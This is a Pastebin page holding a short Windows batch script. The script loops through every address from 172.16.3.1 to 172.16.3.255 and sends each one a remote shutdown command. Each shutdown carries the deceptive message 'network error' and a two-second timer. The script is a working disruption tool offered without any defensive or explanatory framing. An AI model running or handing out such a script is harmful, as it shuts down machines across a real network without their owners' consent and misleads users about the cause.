Guest User

Untitled

a guest
Jul 15th, 2018
89
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.12 KB | None | 0 0
  1. @echo off
  2. SET t=0
  3. :start
  4. SET /a t=t+1
  5. shutdown -m \\172.16.3.%t% -s -c "network error" -t 2
  6. IF %t%==255 Exit
  7. Goto start
Add Comment
Please, Sign In to add comment